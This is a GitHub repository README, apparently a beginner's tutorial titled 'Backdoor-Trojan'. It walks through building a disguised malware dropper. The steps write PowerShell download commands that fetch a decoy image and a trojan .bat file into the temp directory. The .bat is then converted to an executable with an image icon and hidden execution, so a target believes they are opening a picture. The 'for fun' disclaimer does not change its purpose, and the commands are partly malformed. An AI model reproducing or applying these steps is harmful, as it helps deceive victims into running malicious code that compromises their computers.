AnandKatariya / Backdoor-Trojan

In this repositiories you will get some intresting this but this should be use for fun or kidding. This method should not be performed at school , college , or any other public place.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Welcome to Repositorie of how to add Trojan in backdoor👋

Bat-To-Exe

Dont try this at Home, School,Or any other public place!!!


Introduction to Trojan

A Trojan Horse Virus is a type of malware that downloads onto a computer disguised as a legitimate program. The delivery method typically sees an attacker use social engineering to hide malicious code within legitimate software to try and gain users' system access with their software.

If you don't know how to make trojan you need to see my previous repository in that I have explain fully how to make trojan then after that you need to use this repository to add trojan at backdoor.

But all apart in this we will learn how to add trojan in backdoor from powershell.

Go to browser and select the image which you want to send to target.


Then open powershell and direct the powershell to desktop.


Direct to desktop

cd .\Desktop\

Then after this it will be redirected to desktop and after that paste the command but before pasting just edit website.com to ehich image you want to send to target paste that URL.

Downlode you image

Invoke  WebRequest 'https://website.com/file.exe' -OutFile file.exe 
trojan.png

Paste this into your powershell and you will able to downlode the image you can see it on desktop, But if you need to add trojan into backdoor you need to add som new command to codeline.

If you have trojan file add it but if you dont have you need to create it, If you dont know to to create it just check my last repo.. and you will learn. After creating the trojan you need to save it as .bat file.


Now here we will place the trojan file inside the image so we need to add the command in powershell is,

Add trojan in image

Invoke  WebRequest 'https://website.com/file.exe' -OutFile file.exe 
trojan.png
Invoke  WebRequest 'www.Your_trojan_file.bat' -OutFile Virus.bat
virus.bat

But this is not the way if you will downlode the virus file on desktop user will know this so we need to go to temp directory. So

To add file in temp

cd %temp%
Invoke  WebRequest 'https://website.com/file.exe' -OutFile file.exe 
trojan.png
Invoke  WebRequest 'www.Your_trojan_file.bat' -OutFile Virus.bat
virus.bat

after this you need to save this and and you need to save this in all file not in text document and after that save as extension as matrix-trojan.bat you need to save it as .bat it is mandatory. But you will see that file not looking properly it looking like any suspious file so we need to modify it. So we all need to do is

Downlode bat to exe converter

Bat-To-Exe

After install open the file or drag and drop it in the Bat to Exe converter and run the file then select the icon as the thumnail of the same image but before select the icon go to png to ico converter online and convert the image in ico file and then add it as logo and change the exe format into invisible after this you will convert it and thats it your are done.

Author

👤 Anand Katariya

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.

Show your support

Give a ⭐️ if this project helped you!

Stay tuned for more updates.

About

In this repositiories you will get some intresting this but this should be use for fun or kidding. This method should not be performed at school , college , or any other public place.

License:MIT License